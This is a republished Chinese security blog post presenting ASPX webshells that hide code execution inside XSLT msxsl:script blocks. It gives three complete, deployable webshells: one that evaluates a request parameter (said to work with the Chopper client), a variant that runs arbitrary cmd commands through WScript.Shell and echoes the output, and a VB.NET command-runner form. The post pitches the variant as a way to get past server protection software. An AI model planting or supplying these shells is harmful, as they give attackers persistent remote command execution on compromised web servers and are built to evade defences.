Xsl Exec Webshell (aspx)
2020-02-15 11:04:03 Author: mp.weixin.qq.com(查看原文) 阅读量:177 收藏


关于使用xsl的webshell以前已经有人发过了,比如aspx的一个webshell如下

<%@ Page Language="C#" Debug="true" %>

<%@ import Namespace="System.IO"%>

<%@ import Namespace="System.Xml"%>

<%@ import Namespace="System.Xml.Xsl"%>

<%

string xml=@"<?xml version=""1.0""?><root>test</root>";

string xslt=@"<?xml version='1.0'?>

<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">

    <msxsl:script language=""JScript"" implements-prefix=""zcg"">

        <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>

        <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>

        <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>

        <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>

        <![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>

    </msxsl:script>

<xsl:template match=""/root"">

    <xsl:value-of select=""zcg:xml()""/>

</xsl:template>

</xsl:stylesheet>";

XmlDocument xmldoc=new XmlDocument();

xmldoc.LoadXml(xml);

XmlDocument xsldoc=new XmlDocument();

xsldoc.LoadXml(xslt);

XslCompiledTransform xct=new XslCompiledTransform();

xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());

xct.Transform(xmldoc,null,new MemoryStream());

%>

密码为 a,这个webshell是可以用菜刀连接的,测试碰到这种情况:服务器有安全狗等防护软件,提交的各种数据包可能会拦截,而现在想要做的就是执行命令就可以了,为了方便,写了一个命令执行的webshell,可回显,可改密码,具体代码如下:

<%@page language="C#"%>

<%@ import Namespace="System.IO"%>

<%@ import Namespace="System.Xml"%>

<%@ import Namespace="System.Xml.Xsl"%>

<%

string xml=@"<?xml version=""1.0""?><root>test</root>";

string xslt=@"<?xml version='1.0'?>

<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">

    <msxsl:script language=""JScript"" implements-prefix=""zcg"">

    <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>

    <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>

    <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>

    <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>

        <![CDATA[function xml(){

        var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;

        var command = Request.Item['cmd'];

        var r = new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+command);

        var OutStream = r.StdOut;

        var Str = """";

        while (!OutStream.atEndOfStream) {

            Str = Str + OutStream.readAll();

            }

        Response.Write(""<pre>""+Str+""</pre>"");

        }]]>

    </msxsl:script>

<xsl:template match=""/root"">

    <xsl:value-of select=""zcg:xml()""/>

</xsl:template>

</xsl:stylesheet>";

XmlDocument xmldoc=new XmlDocument();

xmldoc.LoadXml(xml);

XmlDocument xsldoc=new XmlDocument();

xsldoc.LoadXml(xslt);

XsltSettings xslt_settings = new XsltSettings(false, true);

xslt_settings.EnableScript = true;

try{

    XslCompiledTransform xct=new XslCompiledTransform();

    xct.Load(xsldoc,xslt_settings,new XmlUrlResolver());

    xct.Transform(xmldoc,null,new MemoryStream());

}

catch (Exception e){

    Response.Write("Error");

}

%>

密码为cmd,可自己改,测试如下图:

附带一个大马里面的命令执行:

<%@ Page Language="VB" Debug="true" %>

<%@ import Namespace="system.IO" %>

<%@ import Namespace="System.Diagnostics" %>

<script runat="server">      

Sub RunCmd(Src As Object, E As EventArgs)            

  Dim myProcess As New Process()            

  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            

  myProcessStartInfo.UseShellExecute = false            

  myProcessStartInfo.RedirectStandardOutput = true            

  myProcess.StartInfo = myProcessStartInfo            

  myProcessStartInfo.Arguments=xcmd.text            

  myProcess.Start()            

  Dim myStreamReader As StreamReader = myProcess.StandardOutput            

  Dim myString As String = myStreamReader.Readtoend()            

  myProcess.Close()            

  mystring=replace(mystring,"<","&lt;")            

  mystring=replace(mystring,">","&gt;")            

  result.text= vbcrlf & "<pre>" & mystring & "</pre>"    

End Sub

</script>

<html>

<body>    

<form runat="server">        

<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        

<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        

<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        

<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        

<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        

<p><asp:Label id="result" runat="server"></asp:Label>       

</form>

</body>

</html>

https://github.com/Ridter/Pentest/

https://github.com/Ridter/Pentest/stargazers

文章出处:Evi1cg's blog   

原文链接:

https://evi1cg.me/archives/Xsl_Exec_Webshell.html

推荐文章++++

*常见web中间件拿shell

*findWebshell webshell检测工具

*WebShell文件上传漏洞靶场第一关


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&amp;mid=2650459793&amp;idx=3&amp;sn=4d771b047ed5aa3aeb47e301989d181f&amp;chksm=83bbab75b4cc2263ca40f17d1c55d6867b6ca87fd568f23a7badaa85ab428d6ef74e8760a5b8#rd
如有侵权请联系:admin#unsafe.sh